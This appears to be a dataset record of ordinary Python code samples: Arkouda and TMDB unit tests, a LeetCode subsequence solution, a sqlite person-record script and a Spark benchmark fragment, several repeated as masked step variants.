print(\"run, spark: unable to find bench\", run_config[\"appName\"])\n\n # spark sql perf configurations\n config_base = SparkBenchMaker.load_base()\n # change the dataset scale\n utils.update_bench_params(base=config_base, bench=bench,\n key=\"numExamples\", value=run_config[\"inputScale\"], is_scale=True)\n\n # change number of partition, each executor has at least one partition\n utils.update_bench_params(base=config_base, bench=bench,\n key=\"numPartitions\", value=run_config[\"numPartition\"], is_scale=False)\n utils.update_bench_params(base=config_base, bench=bench,\n key=\"randomSeed\",\n value=random.randint(0, 10000) if run_config.get(\"randomSeed\", 1) == \"random\" else 1,\n is_scale=False)\n\n bc = SparkBenchMaker.patched_bench_config(config_base,\n {\n \"benchmarks\": [bench]\n })\n\n print(bc)\n exp = SparkExperiment(\n {\n \"app_configs\": base_spk_config,\n \"exp_configs\": {\n \"s3_log_bucket\": run_config[\"logBucket\"],\n \"num_executor\": run_config[\"numExecutor\"],\n \"ins_type\": run_config[\"serverInstanceType\"],\n \"ins_num\": run_config[\"numServerInstance\"],\n \"run_interval\": 0.5,\n \"runs\": 1,\n \"bench_config\": bc,\n },\n \"ins_type_num\": [(run_config[\"serverInstanceType\"], run_config[\"numServerInstance\"])],\n \"variables\": {},\n }\n )\n exp.run()\n return {}\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
import numpy as np
from base_test import ArkoudaTest
from context import arkouda as ak
"""
Encapsulates unit tests for the pdarrayclass module that provide
summarized values via reduction methods
"""
class SummarizationTest(ArkoudaTest):
def setUp(self):
ArkoudaTest.setUp(self)
self.na = np.linspace(1, 10, 10)
self.pda = ak.array(self.na)
def testStd(self):
self.assertEqual(self.na.std(), self.pda.std())
def testMin(self):
self.assertEqual(self.na.min(), self.pda.min())
def testMax(self):
self.assertEqual(self.na.max(), self.pda.max())
def testMean(self):
self.assertEqual(self.na.mean(), self.pda.mean())
def testVar(self):
self.assertEqual(self.na.var(), self.pda.var())
def testAny(self):
self.assertEqual(self.na.any(), self.pda.any())
def testAll(self):
self.assertEqual(self.na.all(), self.pda.all())
|
normal
|
{
"blob_id": "88109909d0c80f25373f917426c3c3634bfc8114",
"index": 6267,
"step-1": "<mask token>\n\n\nclass SummarizationTest(ArkoudaTest):\n\n def setUp(self):\n ArkoudaTest.setUp(self)\n self.na = np.linspace(1, 10, 10)\n self.pda = ak.array(self.na)\n <mask token>\n\n def testMin(self):\n self.assertEqual(self.na.min(), self.pda.min())\n <mask token>\n <mask token>\n\n def testVar(self):\n self.assertEqual(self.na.var(), self.pda.var())\n\n def testAny(self):\n self.assertEqual(self.na.any(), self.pda.any())\n\n def testAll(self):\n self.assertEqual(self.na.all(), self.pda.all())\n",
"step-2": "<mask token>\n\n\nclass SummarizationTest(ArkoudaTest):\n\n def setUp(self):\n ArkoudaTest.setUp(self)\n self.na = np.linspace(1, 10, 10)\n self.pda = ak.array(self.na)\n <mask token>\n\n def testMin(self):\n self.assertEqual(self.na.min(), self.pda.min())\n <mask token>\n\n def testMean(self):\n self.assertEqual(self.na.mean(), self.pda.mean())\n\n def testVar(self):\n self.assertEqual(self.na.var(), self.pda.var())\n\n def testAny(self):\n self.assertEqual(self.na.any(), self.pda.any())\n\n def testAll(self):\n self.assertEqual(self.na.all(), self.pda.all())\n",
"step-3": "<mask token>\n\n\nclass SummarizationTest(ArkoudaTest):\n\n def setUp(self):\n ArkoudaTest.setUp(self)\n self.na = np.linspace(1, 10, 10)\n self.pda = ak.array(self.na)\n <mask token>\n\n def testMin(self):\n self.assertEqual(self.na.min(), self.pda.min())\n\n def testMax(self):\n self.assertEqual(self.na.max(), self.pda.max())\n\n def testMean(self):\n self.assertEqual(self.na.mean(), self.pda.mean())\n\n def testVar(self):\n self.assertEqual(self.na.var(), self.pda.var())\n\n def testAny(self):\n self.assertEqual(self.na.any(), self.pda.any())\n\n def testAll(self):\n self.assertEqual(self.na.all(), self.pda.all())\n",
"step-4": "<mask token>\n\n\nclass SummarizationTest(ArkoudaTest):\n\n def setUp(self):\n ArkoudaTest.setUp(self)\n self.na = np.linspace(1, 10, 10)\n self.pda = ak.array(self.na)\n\n def testStd(self):\n self.assertEqual(self.na.std(), self.pda.std())\n\n def testMin(self):\n self.assertEqual(self.na.min(), self.pda.min())\n\n def testMax(self):\n self.assertEqual(self.na.max(), self.pda.max())\n\n def testMean(self):\n self.assertEqual(self.na.mean(), self.pda.mean())\n\n def testVar(self):\n self.assertEqual(self.na.var(), self.pda.var())\n\n def testAny(self):\n self.assertEqual(self.na.any(), self.pda.any())\n\n def testAll(self):\n self.assertEqual(self.na.all(), self.pda.all())\n",
"step-5": "import numpy as np\nfrom base_test import ArkoudaTest\nfrom context import arkouda as ak\n\n\"\"\"\nEncapsulates unit tests for the pdarrayclass module that provide\nsummarized values via reduction methods\n\"\"\"\n\n\nclass SummarizationTest(ArkoudaTest):\n def setUp(self):\n ArkoudaTest.setUp(self)\n self.na = np.linspace(1, 10, 10)\n self.pda = ak.array(self.na)\n\n def testStd(self):\n self.assertEqual(self.na.std(), self.pda.std())\n\n def testMin(self):\n self.assertEqual(self.na.min(), self.pda.min())\n\n def testMax(self):\n self.assertEqual(self.na.max(), self.pda.max())\n\n def testMean(self):\n self.assertEqual(self.na.mean(), self.pda.mean())\n\n def testVar(self):\n self.assertEqual(self.na.var(), self.pda.var())\n\n def testAny(self):\n self.assertEqual(self.na.any(), self.pda.any())\n\n def testAll(self):\n self.assertEqual(self.na.all(), self.pda.all())\n",
"step-ids": [
6,
7,
8,
9,
11
]
}
|
[
6,
7,
8,
9,
11
] |
from typing import List
class Solution:
def findSubsequences(self, nums: List[int]) ->List[List[int]]:
res: List[List[int]] = []
s = set()
def deep(pos: int, tmp: List[int]):
if pos == len(nums):
if len(tmp) < 2:
return
for i in range(1, len(tmp)):
if tmp[i - 1] > tmp[i]:
return
if tuple(tmp) not in s:
res.append(tmp)
s.add(tuple(tmp))
else:
deep(pos + 1, tmp)
deep(pos + 1, tmp + [nums[pos]])
deep(0, [])
return res
print(Solution().findSubsequences([4, 6, 7, 7]))
|
normal
|
{
"blob_id": "3edfc1098c775fa31456aa3cc938051b2dbb8697",
"index": 1664,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Solution:\n\n def findSubsequences(self, nums: List[int]) ->List[List[int]]:\n res: List[List[int]] = []\n s = set()\n\n def deep(pos: int, tmp: List[int]):\n if pos == len(nums):\n if len(tmp) < 2:\n return\n for i in range(1, len(tmp)):\n if tmp[i - 1] > tmp[i]:\n return\n if tuple(tmp) not in s:\n res.append(tmp)\n s.add(tuple(tmp))\n else:\n deep(pos + 1, tmp)\n deep(pos + 1, tmp + [nums[pos]])\n deep(0, [])\n return res\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Solution:\n\n def findSubsequences(self, nums: List[int]) ->List[List[int]]:\n res: List[List[int]] = []\n s = set()\n\n def deep(pos: int, tmp: List[int]):\n if pos == len(nums):\n if len(tmp) < 2:\n return\n for i in range(1, len(tmp)):\n if tmp[i - 1] > tmp[i]:\n return\n if tuple(tmp) not in s:\n res.append(tmp)\n s.add(tuple(tmp))\n else:\n deep(pos + 1, tmp)\n deep(pos + 1, tmp + [nums[pos]])\n deep(0, [])\n return res\n\n\nprint(Solution().findSubsequences([4, 6, 7, 7]))\n",
"step-4": "from typing import List\n\n\nclass Solution:\n\n def findSubsequences(self, nums: List[int]) ->List[List[int]]:\n res: List[List[int]] = []\n s = set()\n\n def deep(pos: int, tmp: List[int]):\n if pos == len(nums):\n if len(tmp) < 2:\n return\n for i in range(1, len(tmp)):\n if tmp[i - 1] > tmp[i]:\n return\n if tuple(tmp) not in s:\n res.append(tmp)\n s.add(tuple(tmp))\n else:\n deep(pos + 1, tmp)\n deep(pos + 1, tmp + [nums[pos]])\n deep(0, [])\n return res\n\n\nprint(Solution().findSubsequences([4, 6, 7, 7]))\n",
"step-5": null,
"step-ids": [
0,
2,
3,
4
]
}
|
[
0,
2,
3,
4
] |
<|reserved_special_token_0|>
class TestTmdb(BaseTestCase):
<|reserved_special_token_0|>
def test_discover(self):
""" Testing the TMDB API discover endpoint """
response = Tmdb.discover()
self.assertTrue(int(response.status_code) == 200)
data = response.json()
self.assertTrue(isinstance(data['results'], list))
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def test_similar(self):
""" Testing the TMDB API similar endpoint """
response = Tmdb.similar(69740)
self.assertTrue(int(response.status_code) == 200)
data = response.json()
self.assertTrue(isinstance(data['results'], list))
def test_seasons(self):
""" Testing the TMDB API seasons endpoint """
response = Tmdb.season(tmdb_show_id=69740, season_number=1)
self.assertTrue(int(response.status_code) == 200)
data = response.json()
self.assertTrue(isinstance(data['episodes'], list))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TestTmdb(BaseTestCase):
<|reserved_special_token_0|>
def test_discover(self):
""" Testing the TMDB API discover endpoint """
response = Tmdb.discover()
self.assertTrue(int(response.status_code) == 200)
data = response.json()
self.assertTrue(isinstance(data['results'], list))
def test_search(self):
""" Testing the TMDB API search endpoint """
response = Tmdb.search('ozark')
self.assertTrue(int(response.status_code) == 200)
data = response.json()
self.assertTrue(isinstance(data['results'], list))
<|reserved_special_token_0|>
def test_similar(self):
""" Testing the TMDB API similar endpoint """
response = Tmdb.similar(69740)
self.assertTrue(int(response.status_code) == 200)
data = response.json()
self.assertTrue(isinstance(data['results'], list))
def test_seasons(self):
""" Testing the TMDB API seasons endpoint """
response = Tmdb.season(tmdb_show_id=69740, season_number=1)
self.assertTrue(int(response.status_code) == 200)
data = response.json()
self.assertTrue(isinstance(data['episodes'], list))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TestTmdb(BaseTestCase):
<|reserved_special_token_0|>
def test_discover(self):
""" Testing the TMDB API discover endpoint """
response = Tmdb.discover()
self.assertTrue(int(response.status_code) == 200)
data = response.json()
self.assertTrue(isinstance(data['results'], list))
def test_search(self):
""" Testing the TMDB API search endpoint """
response = Tmdb.search('ozark')
self.assertTrue(int(response.status_code) == 200)
data = response.json()
self.assertTrue(isinstance(data['results'], list))
def test_detail(self):
""" Testing the TMDB API get show """
response = Tmdb.detail(69740)
self.assertTrue(int(response.status_code) == 200)
data = response.json()
self.assertTrue(data['id'])
self.assertTrue(data['name'])
def test_similar(self):
""" Testing the TMDB API similar endpoint """
response = Tmdb.similar(69740)
self.assertTrue(int(response.status_code) == 200)
data = response.json()
self.assertTrue(isinstance(data['results'], list))
def test_seasons(self):
""" Testing the TMDB API seasons endpoint """
response = Tmdb.season(tmdb_show_id=69740, season_number=1)
self.assertTrue(int(response.status_code) == 200)
data = response.json()
self.assertTrue(isinstance(data['episodes'], list))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TestTmdb(BaseTestCase):
"""
Testing if we have the good responses from the api
"""
def test_discover(self):
""" Testing the TMDB API discover endpoint """
response = Tmdb.discover()
self.assertTrue(int(response.status_code) == 200)
data = response.json()
self.assertTrue(isinstance(data['results'], list))
def test_search(self):
""" Testing the TMDB API search endpoint """
response = Tmdb.search('ozark')
self.assertTrue(int(response.status_code) == 200)
data = response.json()
self.assertTrue(isinstance(data['results'], list))
def test_detail(self):
""" Testing the TMDB API get show """
response = Tmdb.detail(69740)
self.assertTrue(int(response.status_code) == 200)
data = response.json()
self.assertTrue(data['id'])
self.assertTrue(data['name'])
def test_similar(self):
""" Testing the TMDB API similar endpoint """
response = Tmdb.similar(69740)
self.assertTrue(int(response.status_code) == 200)
data = response.json()
self.assertTrue(isinstance(data['results'], list))
def test_seasons(self):
""" Testing the TMDB API seasons endpoint """
response = Tmdb.season(tmdb_show_id=69740, season_number=1)
self.assertTrue(int(response.status_code) == 200)
data = response.json()
self.assertTrue(isinstance(data['episodes'], list))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
# project/tests/test_tmdb.py
import unittest
import json
from project.server import db
from project.server.models import Tmdb
from project.tests.base import BaseTestCase
class TestTmdb(BaseTestCase):
"""
Testing if we have the good responses from the api
"""
def test_discover(self):
""" Testing the TMDB API discover endpoint """
response = Tmdb.discover()
self.assertTrue(int(response.status_code) == 200)
data = response.json()
self.assertTrue(isinstance(data['results'], list))
# TODO check if all the shows are in the good format (can be from_dict/to_dict)
def test_search(self):
""" Testing the TMDB API search endpoint """
response = Tmdb.search('ozark')
self.assertTrue(int(response.status_code) == 200)
data = response.json()
self.assertTrue(isinstance(data['results'], list))
# TODO check if all the shows are in the good format (can be from_dict/to_dict)
def test_detail(self):
""" Testing the TMDB API get show """
response = Tmdb.detail(69740)
self.assertTrue(int(response.status_code) == 200)
data = response.json()
self.assertTrue(data['id'])
self.assertTrue(data['name'])
# TODO check if all the shows are in the good format (can be from_dict/to_dict)
def test_similar(self):
""" Testing the TMDB API similar endpoint """
response = Tmdb.similar(69740)
self.assertTrue(int(response.status_code) == 200)
data = response.json()
self.assertTrue(isinstance(data['results'], list))
# TODO check if all the shows are in the good format (can be from_dict/to_dict)
def test_seasons(self):
""" Testing the TMDB API seasons endpoint """
response = Tmdb.season(tmdb_show_id = 69740, season_number = 1)
self.assertTrue(int(response.status_code) == 200)
data = response.json()
self.assertTrue(isinstance(data['episodes'], list))
# TODO check if all the shows are in the good format (can be from_dict/to_dict)
if __name__ == '__main__':
unittest.main()
|
flexible
|
{
"blob_id": "9e9403ea1c128e07803d080b337003055759c5ae",
"index": 4507,
"step-1": "<mask token>\n\n\nclass TestTmdb(BaseTestCase):\n <mask token>\n\n def test_discover(self):\n \"\"\" Testing the TMDB API discover endpoint \"\"\"\n response = Tmdb.discover()\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(isinstance(data['results'], list))\n <mask token>\n <mask token>\n\n def test_similar(self):\n \"\"\" Testing the TMDB API similar endpoint \"\"\"\n response = Tmdb.similar(69740)\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(isinstance(data['results'], list))\n\n def test_seasons(self):\n \"\"\" Testing the TMDB API seasons endpoint \"\"\"\n response = Tmdb.season(tmdb_show_id=69740, season_number=1)\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(isinstance(data['episodes'], list))\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass TestTmdb(BaseTestCase):\n <mask token>\n\n def test_discover(self):\n \"\"\" Testing the TMDB API discover endpoint \"\"\"\n response = Tmdb.discover()\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(isinstance(data['results'], list))\n\n def test_search(self):\n \"\"\" Testing the TMDB API search endpoint \"\"\"\n response = Tmdb.search('ozark')\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(isinstance(data['results'], list))\n <mask token>\n\n def test_similar(self):\n \"\"\" Testing the TMDB API similar endpoint \"\"\"\n response = Tmdb.similar(69740)\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(isinstance(data['results'], list))\n\n def test_seasons(self):\n \"\"\" Testing the TMDB API seasons endpoint \"\"\"\n response = Tmdb.season(tmdb_show_id=69740, season_number=1)\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(isinstance(data['episodes'], list))\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass TestTmdb(BaseTestCase):\n <mask token>\n\n def test_discover(self):\n \"\"\" Testing the TMDB API discover endpoint \"\"\"\n response = Tmdb.discover()\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(isinstance(data['results'], list))\n\n def test_search(self):\n \"\"\" Testing the TMDB API search endpoint \"\"\"\n response = Tmdb.search('ozark')\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(isinstance(data['results'], list))\n\n def test_detail(self):\n \"\"\" Testing the TMDB API get show \"\"\"\n response = Tmdb.detail(69740)\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(data['id'])\n self.assertTrue(data['name'])\n\n def test_similar(self):\n \"\"\" Testing the TMDB API similar endpoint \"\"\"\n response = Tmdb.similar(69740)\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(isinstance(data['results'], list))\n\n def test_seasons(self):\n \"\"\" Testing the TMDB API seasons endpoint \"\"\"\n response = Tmdb.season(tmdb_show_id=69740, season_number=1)\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(isinstance(data['episodes'], list))\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass TestTmdb(BaseTestCase):\n \"\"\"\n Testing if we have the good responses from the api\n \"\"\"\n\n def test_discover(self):\n \"\"\" Testing the TMDB API discover endpoint \"\"\"\n response = Tmdb.discover()\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(isinstance(data['results'], list))\n\n def test_search(self):\n \"\"\" Testing the TMDB API search endpoint \"\"\"\n response = Tmdb.search('ozark')\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(isinstance(data['results'], list))\n\n def test_detail(self):\n \"\"\" Testing the TMDB API get show \"\"\"\n response = Tmdb.detail(69740)\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(data['id'])\n self.assertTrue(data['name'])\n\n def test_similar(self):\n \"\"\" Testing the TMDB API similar endpoint \"\"\"\n response = Tmdb.similar(69740)\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(isinstance(data['results'], list))\n\n def test_seasons(self):\n \"\"\" Testing the TMDB API seasons endpoint \"\"\"\n response = Tmdb.season(tmdb_show_id=69740, season_number=1)\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(isinstance(data['episodes'], list))\n\n\n<mask token>\n",
"step-5": "# project/tests/test_tmdb.py\n\n\nimport unittest\nimport json\n\nfrom project.server import db\nfrom project.server.models import Tmdb\nfrom project.tests.base import BaseTestCase\n\n\nclass TestTmdb(BaseTestCase):\n \"\"\"\n Testing if we have the good responses from the api\n \"\"\"\n def test_discover(self):\n \"\"\" Testing the TMDB API discover endpoint \"\"\"\n response = Tmdb.discover()\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(isinstance(data['results'], list))\n # TODO check if all the shows are in the good format (can be from_dict/to_dict)\n\n def test_search(self):\n \"\"\" Testing the TMDB API search endpoint \"\"\"\n response = Tmdb.search('ozark')\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(isinstance(data['results'], list))\n # TODO check if all the shows are in the good format (can be from_dict/to_dict)\n\n def test_detail(self):\n \"\"\" Testing the TMDB API get show \"\"\"\n response = Tmdb.detail(69740)\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(data['id'])\n self.assertTrue(data['name'])\n # TODO check if all the shows are in the good format (can be from_dict/to_dict)\n\n def test_similar(self):\n \"\"\" Testing the TMDB API similar endpoint \"\"\"\n response = Tmdb.similar(69740)\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(isinstance(data['results'], list))\n # TODO check if all the shows are in the good format (can be from_dict/to_dict)\n \n def test_seasons(self):\n \"\"\" Testing the TMDB API seasons endpoint \"\"\"\n response = Tmdb.season(tmdb_show_id = 69740, season_number = 1)\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(isinstance(data['episodes'], list))\n # TODO check if all the shows are in the good format (can be from_dict/to_dict)\n \n\nif __name__ == '__main__':\n unittest.main()\n",
"step-ids": [
4,
5,
6,
7,
10
]
}
|
[
4,
5,
6,
7,
10
] |
<|reserved_special_token_0|>
class Person:
def __init__(self, name, surname, job, salary):
self.name = name
self.surname = surname
self.job = job
self.salary = salary
def create(name):
conn = db.connect(name + '.db')
c = conn.cursor()
c.execute(
"""CREATE TABLE first(
id integer PRIMARY KEY AUTOINCREMENT,
name text,
surname text
)"""
)
c.execute(
"""CREATE TABLE second(
id integer PRIMARY KEY AUTOINCREMENT,
surname text,
job text,
salary integer,
FOREIGN KEY(id) REFERENCES first(id),
FOREIGN KEY(surname) REFERENCES first(surname)
)"""
)
conn.commit()
conn.close()
<|reserved_special_token_0|>
def insert():
name = input('Enter your name: ')
surname = input('Enter your surname: ')
confirm = input('Have you got a job? ')
if 'y' in confirm:
job = input('What kind of job you have? ')
salary = input('How much they pay for you? ')
surname = Person(name, surname, job, salary)
persons.append(surname)
database(surname)
else:
print('We need a humans with job, bye')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
os.system('clear')
<|reserved_special_token_0|>
class Person:
def __init__(self, name, surname, job, salary):
self.name = name
self.surname = surname
self.job = job
self.salary = salary
def create(name):
conn = db.connect(name + '.db')
c = conn.cursor()
c.execute(
"""CREATE TABLE first(
id integer PRIMARY KEY AUTOINCREMENT,
name text,
surname text
)"""
)
c.execute(
"""CREATE TABLE second(
id integer PRIMARY KEY AUTOINCREMENT,
surname text,
job text,
salary integer,
FOREIGN KEY(id) REFERENCES first(id),
FOREIGN KEY(surname) REFERENCES first(surname)
)"""
)
conn.commit()
conn.close()
def database(s):
conn = db.connect(sqldb + '.db')
c = conn.cursor()
c.execute('INSERT INTO first(name, surname) VALUES(?, ?)', (s.name, s.
surname))
c.execute('INSERT INTO second(surname, job, salary) VALUES(?, ?, ?)', (
s.surname, s.job, s.salary))
conn.commit()
conn.close()
def insert():
name = input('Enter your name: ')
surname = input('Enter your surname: ')
confirm = input('Have you got a job? ')
if 'y' in confirm:
job = input('What kind of job you have? ')
salary = input('How much they pay for you? ')
surname = Person(name, surname, job, salary)
persons.append(surname)
database(surname)
else:
print('We need a humans with job, bye')
while True:
command = input('>> ')
if command == 'insert':
insert()
elif command == 'list':
for i in persons:
print(i.surname)
continue
elif command == 'create database':
sqldb = input('Enter the name of new database: ')
create(sqldb)
elif command == 'clear' or command == 'cls':
loc = os.getcwd()
if 'C:' in loc or 'D:' in loc:
os.system('cls')
else:
os.system('clear')
else:
print('No command found')
continue
<|reserved_special_token_1|>
<|reserved_special_token_0|>
os.system('clear')
persons = []
class Person:
def __init__(self, name, surname, job, salary):
self.name = name
self.surname = surname
self.job = job
self.salary = salary
def create(name):
conn = db.connect(name + '.db')
c = conn.cursor()
c.execute(
"""CREATE TABLE first(
id integer PRIMARY KEY AUTOINCREMENT,
name text,
surname text
)"""
)
c.execute(
"""CREATE TABLE second(
id integer PRIMARY KEY AUTOINCREMENT,
surname text,
job text,
salary integer,
FOREIGN KEY(id) REFERENCES first(id),
FOREIGN KEY(surname) REFERENCES first(surname)
)"""
)
conn.commit()
conn.close()
def database(s):
conn = db.connect(sqldb + '.db')
c = conn.cursor()
c.execute('INSERT INTO first(name, surname) VALUES(?, ?)', (s.name, s.
surname))
c.execute('INSERT INTO second(surname, job, salary) VALUES(?, ?, ?)', (
s.surname, s.job, s.salary))
conn.commit()
conn.close()
def insert():
name = input('Enter your name: ')
surname = input('Enter your surname: ')
confirm = input('Have you got a job? ')
if 'y' in confirm:
job = input('What kind of job you have? ')
salary = input('How much they pay for you? ')
surname = Person(name, surname, job, salary)
persons.append(surname)
database(surname)
else:
print('We need a humans with job, bye')
while True:
command = input('>> ')
if command == 'insert':
insert()
elif command == 'list':
for i in persons:
print(i.surname)
continue
elif command == 'create database':
sqldb = input('Enter the name of new database: ')
create(sqldb)
elif command == 'clear' or command == 'cls':
loc = os.getcwd()
if 'C:' in loc or 'D:' in loc:
os.system('cls')
else:
os.system('clear')
else:
print('No command found')
continue
<|reserved_special_token_1|>
import os
import sqlite3 as db
os.system('clear')
persons = []
class Person:
def __init__(self, name, surname, job, salary):
self.name = name
self.surname = surname
self.job = job
self.salary = salary
def create(name):
conn = db.connect(name + '.db')
c = conn.cursor()
c.execute(
"""CREATE TABLE first(
id integer PRIMARY KEY AUTOINCREMENT,
name text,
surname text
)"""
)
c.execute(
"""CREATE TABLE second(
id integer PRIMARY KEY AUTOINCREMENT,
surname text,
job text,
salary integer,
FOREIGN KEY(id) REFERENCES first(id),
FOREIGN KEY(surname) REFERENCES first(surname)
)"""
)
conn.commit()
conn.close()
def database(s):
conn = db.connect(sqldb + '.db')
c = conn.cursor()
c.execute('INSERT INTO first(name, surname) VALUES(?, ?)', (s.name, s.
surname))
c.execute('INSERT INTO second(surname, job, salary) VALUES(?, ?, ?)', (
s.surname, s.job, s.salary))
conn.commit()
conn.close()
def insert():
name = input('Enter your name: ')
surname = input('Enter your surname: ')
confirm = input('Have you got a job? ')
if 'y' in confirm:
job = input('What kind of job you have? ')
salary = input('How much they pay for you? ')
surname = Person(name, surname, job, salary)
persons.append(surname)
database(surname)
else:
print('We need a humans with job, bye')
while True:
command = input('>> ')
if command == 'insert':
insert()
elif command == 'list':
for i in persons:
print(i.surname)
continue
elif command == 'create database':
sqldb = input('Enter the name of new database: ')
create(sqldb)
elif command == 'clear' or command == 'cls':
loc = os.getcwd()
if 'C:' in loc or 'D:' in loc:
os.system('cls')
else:
os.system('clear')
else:
print('No command found')
continue
<|reserved_special_token_1|>
import os
import sqlite3 as db
os.system('clear')
persons = []
class Person:
def __init__(self, name, surname, job, salary):
self.name = name
self.surname = surname
self.job = job
self.salary = salary
def create(name):
conn = db.connect(name + '.db')
c = conn.cursor()
c.execute("""CREATE TABLE first(
id integer PRIMARY KEY AUTOINCREMENT,
name text,
surname text
)""")
c.execute("""CREATE TABLE second(
id integer PRIMARY KEY AUTOINCREMENT,
surname text,
job text,
salary integer,
FOREIGN KEY(id) REFERENCES first(id),
FOREIGN KEY(surname) REFERENCES first(surname)
)""")
conn.commit()
conn.close()
def database(s):
conn = db.connect(sqldb+'.db')
c = conn.cursor()
c.execute('INSERT INTO first(name, surname) VALUES(?, ?)', (s.name, s.surname))
c.execute('INSERT INTO second(surname, job, salary) VALUES(?, ?, ?)', (s.surname, s.job, s.salary))
conn.commit()
conn.close()
def insert():
name = input('Enter your name: ')
surname = input('Enter your surname: ')
confirm = input('Have you got a job? ')
if 'y' in confirm:
job = input('What kind of job you have? ')
salary = input('How much they pay for you? ')
surname = Person(name, surname, job, salary)
persons.append(surname)
database(surname)
else:
print('We need a humans with job, bye')
while True:
command = input(">> ")
if command == 'insert':
insert()
elif command == 'list':
for i in persons:
print(i.surname)
continue
elif command == 'create database':
sqldb = input('Enter the name of new database: ')
create(sqldb)
elif command == 'clear' or command == 'cls':
loc = os.getcwd()
if 'C:' in loc or 'D:' in loc:
os.system('cls')
else:
os.system('clear')
else:
print('No command found')
continue
|
flexible
|
{
"blob_id": "7ff19ee35422395f78dca1e17a736df20a40ea98",
"index": 7569,
"step-1": "<mask token>\n\n\nclass Person:\n\n def __init__(self, name, surname, job, salary):\n self.name = name\n self.surname = surname\n self.job = job\n self.salary = salary\n\n\ndef create(name):\n conn = db.connect(name + '.db')\n c = conn.cursor()\n c.execute(\n \"\"\"CREATE TABLE first(\n\t\t\tid integer PRIMARY KEY AUTOINCREMENT,\n\t\t\tname text,\n\t\t\tsurname text\n\t\t)\"\"\"\n )\n c.execute(\n \"\"\"CREATE TABLE second(\n\t\t\tid integer PRIMARY KEY AUTOINCREMENT,\n\t\t\tsurname text,\n\t\t\tjob text,\n\t\t\tsalary integer,\n\t\t\tFOREIGN KEY(id) REFERENCES first(id),\n\t\t\tFOREIGN KEY(surname) REFERENCES first(surname)\n\t\t)\"\"\"\n )\n conn.commit()\n conn.close()\n\n\n<mask token>\n\n\ndef insert():\n name = input('Enter your name: ')\n surname = input('Enter your surname: ')\n confirm = input('Have you got a job? ')\n if 'y' in confirm:\n job = input('What kind of job you have? ')\n salary = input('How much they pay for you? ')\n surname = Person(name, surname, job, salary)\n persons.append(surname)\n database(surname)\n else:\n print('We need a humans with job, bye')\n\n\n<mask token>\n",
"step-2": "<mask token>\nos.system('clear')\n<mask token>\n\n\nclass Person:\n\n def __init__(self, name, surname, job, salary):\n self.name = name\n self.surname = surname\n self.job = job\n self.salary = salary\n\n\ndef create(name):\n conn = db.connect(name + '.db')\n c = conn.cursor()\n c.execute(\n \"\"\"CREATE TABLE first(\n\t\t\tid integer PRIMARY KEY AUTOINCREMENT,\n\t\t\tname text,\n\t\t\tsurname text\n\t\t)\"\"\"\n )\n c.execute(\n \"\"\"CREATE TABLE second(\n\t\t\tid integer PRIMARY KEY AUTOINCREMENT,\n\t\t\tsurname text,\n\t\t\tjob text,\n\t\t\tsalary integer,\n\t\t\tFOREIGN KEY(id) REFERENCES first(id),\n\t\t\tFOREIGN KEY(surname) REFERENCES first(surname)\n\t\t)\"\"\"\n )\n conn.commit()\n conn.close()\n\n\ndef database(s):\n conn = db.connect(sqldb + '.db')\n c = conn.cursor()\n c.execute('INSERT INTO first(name, surname) VALUES(?, ?)', (s.name, s.\n surname))\n c.execute('INSERT INTO second(surname, job, salary) VALUES(?, ?, ?)', (\n s.surname, s.job, s.salary))\n conn.commit()\n conn.close()\n\n\ndef insert():\n name = input('Enter your name: ')\n surname = input('Enter your surname: ')\n confirm = input('Have you got a job? ')\n if 'y' in confirm:\n job = input('What kind of job you have? ')\n salary = input('How much they pay for you? ')\n surname = Person(name, surname, job, salary)\n persons.append(surname)\n database(surname)\n else:\n print('We need a humans with job, bye')\n\n\nwhile True:\n command = input('>> ')\n if command == 'insert':\n insert()\n elif command == 'list':\n for i in persons:\n print(i.surname)\n continue\n elif command == 'create database':\n sqldb = input('Enter the name of new database: ')\n create(sqldb)\n elif command == 'clear' or command == 'cls':\n loc = os.getcwd()\n if 'C:' in loc or 'D:' in loc:\n os.system('cls')\n else:\n os.system('clear')\n else:\n print('No command found')\n continue\n",
